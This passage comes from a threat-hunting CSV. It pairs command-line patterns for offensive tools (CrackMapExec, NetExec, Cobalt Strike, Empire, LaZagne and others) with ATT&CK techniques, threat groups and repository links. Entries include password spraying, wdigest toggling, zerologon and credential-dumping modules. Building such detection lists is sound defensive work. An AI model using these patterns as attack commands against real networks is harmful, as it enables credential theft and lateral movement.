command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -M slinky -o SERVER=*",".{0,1000}\s\-M\sslinky\s\-o\sSERVER\=.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -M spider_plus *",".{0,1000}\s\-M\sspider_plus\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M spider_plus -o MAX_FILE_SIZE=100*",".{0,1000}\s\-M\sspider_plus\s\-o\sMAX_FILE_SIZE\=100.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -M teams_localdb *",".{0,1000}\s\-M\steams_localdb\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M tokens*",".{0,1000}\s\-M\stokens.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -M uac",".{0,1000}\s\-M\suac","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -m venv csexec *",".{0,1000}\s\-m\svenv\scsexec\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* -M wdigest -o ACTION=disable*",".{0,1000}\s\-M\swdigest\s\-o\sACTION\=disable.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -M wdigest -o ACTION=enable*",".{0,1000}\s\-M\swdigest\s\-o\sACTION\=enable.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -M web_delivery*",".{0,1000}\s\-M\sweb_delivery.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -M zerologon *",".{0,1000}\s\-M\szerologon\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* m3-gen.py *",".{0,1000}\sm3\-gen\.py\s.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","492","121","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" "* main.c log.c shelljack.c *",".{0,1000}\smain\.c\s\slog\.c\sshelljack\.c\s.{0,1000}","offensive_tool_keyword","Mara","Mara is a userland pty/tty sniffer","T1055 - T1106 - T1059","TA0002 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/io-tl/Mara/","1","0","N/A","9","1","50","6","2023-12-22T16:52:47Z","2022-08-02T13:02:41Z" "* MakeMeEnterpriseAdmin.ps1",".{0,1000}\sMakeMeEnterpriseAdmin\.ps1","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "* --maketoken --username * --password * --domain *",".{0,1000}\s\-\-maketoken\s\-\-username\s.{0,1000}\s\-\-password\s.{0,1000}\s\-\-domain\s.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "* malleable.profile*",".{0,1000}\smalleable\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "* malleable-c2-randomizer*",".{0,1000}\smalleable\-c2\-randomizer.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "* mask?a?a?a?a?*",".{0,1000}\smask\?a\?a\?a\?a\?.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* --mask=?1?1?1* --min-len*",".{0,1000}\s\-\-mask\=\?1\?1\?1.{0,1000}\s\-\-min\-len.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* --max-attack-time*",".{0,1000}\s\-\-max\-attack\-time.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "* maxdb-info.nse*",".{0,1000}\smaxdb\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mcafee-epo-agent.nse*",".{0,1000}\smcafee\-epo\-agent\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -mdns y -mdnsunicast n*",".{0,1000}\s\-mdns\sy\s\-mdnsunicast\sn.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "* -mDNSTTL *",".{0,1000}\s\-mDNSTTL\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* membase-brute.nse*",".{0,1000}\smembase\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* membase-http-info.nse*",".{0,1000}\smembase\-http\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* memcached-info.nse*",".{0,1000}\smemcached\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* memorpy *",".{0,1000}\smemorpy\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* memorydump.py*",".{0,1000}\smemorydump\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "* memreader.c *",".{0,1000}\smemreader\.c\s.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","27","4","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z" "* MemReader_BoF*",".{0,1000}\sMemReader_BoF.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","27","4","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z" "* merlin.dll*",".{0,1000}\smerlin\.dll.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "* merlin.py *",".{0,1000}\smerlin\.py\s.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "* met_inject*",".{0,1000}\smet_inject.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* metasploit-info.nse*",".{0,1000}\smetasploit\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* metasploit-msgrpc-brute.nse*",".{0,1000}\smetasploit\-msgrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* metasploit-xmlrpc-brute.nse*",".{0,1000}\smetasploit\-xmlrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -method * -nthash *",".{0,1000}\s\-method\s.{0,1000}\s\-nthash\s.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","5","427","61","2024-03-13T20:04:51Z","2022-01-16T06:50:44Z" "* -Method GenRelayList*",".{0,1000}\s\-Method\sGenRelayList.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* -Method SessionHunter*",".{0,1000}\s\-Method\sSessionHunter.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* -Method Spray -AccountAsPassword*",".{0,1000}\s\-Method\sSpray\s\-AccountAsPassword.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* -Method Spray -EmptyPassword*",".{0,1000}\s\-Method\sSpray\s\-EmptyPassword.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* -Method Spray -Hash *",".{0,1000}\s\-Method\sSpray\s\-Hash\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* -Method Spray -Password *",".{0,1000}\s\-Method\sSpray\s\-Password\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* Microsploit.sh*",".{0,1000}\sMicrosploit\.sh.{0,1000}","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","0","N/A","N/A","5","435","135","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z" "* mikrotik-routeros-brute.nse*",".{0,1000}\smikrotik\-routeros\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mimikittenz*",".{0,1000}\smimikittenz.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 